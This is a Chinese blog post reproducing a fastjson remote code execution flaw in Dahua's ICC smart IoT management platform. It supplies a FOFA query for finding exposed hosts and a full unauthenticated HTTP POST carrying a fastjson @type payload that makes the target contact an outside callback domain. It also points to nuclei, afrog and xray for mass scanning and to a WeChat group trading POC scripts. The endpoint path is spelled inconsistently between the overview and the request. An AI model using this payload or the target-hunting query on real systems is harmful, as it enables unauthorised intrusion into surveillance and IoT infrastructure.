首页 前端知识 【漏洞复现】大华智能物联综合管理平台 fastjson远程代码执行漏洞

【漏洞复现】大华智能物联综合管理平台 fastjson远程代码执行漏洞

2024-06-14 23:06:56 前端知识 前端哥 765 534 我要收藏

0x01 产品简介

大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。

0x02 漏洞概述

由于大华智能物联综合管理平台使用了存在漏洞的Fastson组件,未经身份验让的攻击者可利用 /ev0-uns/v1.0/auths/sysusers/random接口发送恶意的序列化数据执行任意指令,造成代码执行。

0x03 搜索语法

FOFA:icon_hash="-1935899595"

在这里插入图片描述

0x04 漏洞复现

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close
 
{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://asvjwdpldi.dgrh3.cn"}
        }""
}

在这里插入图片描述
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

转载请注明出处或者链接地址:https://www.qianduange.cn//article/12173.html
评论
发布的文章

JQuery中的load()、$

2024-05-10 08:05:15

大家推荐的文章
会员中心 联系我 留言建议 回顶部
复制成功!